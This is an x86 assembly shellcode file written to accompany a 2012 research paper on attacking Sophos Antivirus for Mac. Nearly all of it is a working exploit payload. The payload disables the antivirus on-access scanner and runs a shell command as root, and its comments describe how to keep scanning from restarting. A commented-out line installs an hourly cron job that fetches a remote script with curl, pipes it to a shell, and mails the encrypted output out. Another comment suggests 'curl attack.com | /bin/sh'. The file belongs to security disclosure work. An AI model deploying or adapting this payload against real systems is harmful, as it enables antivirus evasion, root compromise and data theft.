; This file accompanies the paper "Sophail: Applied attacks against Sophos Antivirus".
;
; Tavis Ormandy <taviso@cmpxchg8b.com, September 2012
;

BITS 32
ORG  0

%define offsetof(a, b) (a %+ . %+ b - a)

%define savi_bindnow    0xC01D02FD
%define savi_dlsym      0xC034BE96
%define RTLD_DEFAULT    0xFFFFFFFE

        ; A nopsled to guarantee the stream buffer gets aligned properly.
        times   2048 nop

        ; Load current address.
        call    shellcode

; This is our constant pool, we can reference data relative to the
; address pushed onto the stack from the initial call. We need to do this
; because we cant guess where they will be located at runtime.
constantpool:
    .ipc:       dd 1
    .abort:     db "abort", 0
    .pause:     db "pause", 0
    .system:    db "system", 0
    .machdep:   db "machdep.sav", 0
    .sysctl:    db "sysctlbyname", 0
    ;.command:  db "/usr/bin/id", 0
    ;.command:  db "crontab - <<< ", '"', "@hourly (curl -s https://example.com/cmd.php | /bin/sh | openssl des -e -a -k Gy74eW3e) 2>&1 | mail demo@example.com", '"', 0
    .command:   db "/Applications/Calculator.app/Contents/MacOS/Calculator", 0

shellcode:
        ; This is our shellcode. First, save the stack pointer then make sure
        ; it's aligned. Apple enforces stack alignment on system calls with
        ; aligned loads at various locations, so we really need to manage our
        ; stack carefully.
        mov     ebp, esp
        and     esp, 0xFFFFFF00

        ; Next, we call our setup routine. This is any routine that calls the
        ; potentially unresolved symbols we need. This is required before we
        ; resolve lazy bindings because Apple's rtld implementation does not
        ; handle bind requests from anonymous mappings gracefully.
        ;
        ; This happens because the resolver peeks at the return address to
        ; guess which image is calling, and adjusts the search order
        ; accordingly. This makes sense to support features like RTLD_NEXT,
        ; RTLD_SELF and so on, but it does not handle anonymous mappings.
        ;
        ; This is an annoying bug, but this workaround will do.
        mov     eax, savi_bindnow
        call    eax

        ; Now we can use dlsym safely to find routines that are located in
        ; randomized modules. Fetch the location of sysctlbyname, which we use
        ; to communicate with the onaccess scanner.
        ;
        ;    dlsym(RTLD_DEFAULT, "sysctlbyname");
        ;
        ; Notice that all constants are referenced relative to the saved
        ; return address on the stack. We also have to keep the stack clean so
        ; we don't break alignment.
        push    dword [ebp]
        add     dword [esp], offsetof(constantpool, sysctl)
        push    RTLD_DEFAULT
        mov     eax, savi_dlsym
        call    eax
        add     esp, 2 * 4

        ; Now we disable the onaccess scanner. This will avoid a deadlock on
        ; I/O, as Sophos' kernel extension doesn't handle this situation well.
        ;
        ;    sysctlbyname("machdep.sav", 0, 0, 1, 0x404);
        ;
        ; When InterCheck terminates, launchd will respawn it and it will
        ; automatically re-enable the scanning, so make sure you're prepared
        ; for that.
        ;
        ; If you never want scanning to restart, use pause() instead of
        ; abort(), and call kextunload in your second stage payload.
        push    0x00000404
        push    dword [ebp]
        add     dword [esp], offsetof(constantpool, ipc)
        push    0x00000000
        push    0x00000000
        push    dword [ebp]
        add     dword [esp], offsetof(constantpool, machdep)
        call    eax
        add     esp, 5 * 4

        ; Now to do something useful, Locate the address of system which we
        ; will use for the next stage of our exploit.
        ;
        ;    dlsym(RTLD_DEFAULT, "system");
        ;
        push    dword [ebp]
        add     dword [esp], offsetof(constantpool, system)
        push    RTLD_DEFAULT
        mov     eax, savi_dlsym
        call    eax
        add     esp, 2 * 4

        ; Now we can invoke a shell command as root. I'm using /usr/bin/id,
        ; but a real attack will likely use "curl attack.com | /bin/sh" or
        ; something similar.
        ;
        ;    system("/usr/bin/id");
        ;
        sub     esp, 3 * 4
        push    dword [ebp]
        add     dword [esp], offsetof(constantpool, command)
        call    eax
        add     esp, 4 * 4

        ; Find the location of abort. Our shellcode has finished, we can
        ; terminate the process.
        ;
        ;    dlsym(RTLD_DEFAULT, "abort");
        ;
        ; If you don't want scanning to restart, use pause() instead.
        push    dword [ebp]
        add     dword [esp], offsetof(constantpool, pause)
        push    RTLD_DEFAULT
        mov     eax, savi_dlsym
        call    eax
        add     esp, 2 * 4

        ; Terminate the process once our shell command has completed.
        call    eax

        ; Should never reach here.
        hlt
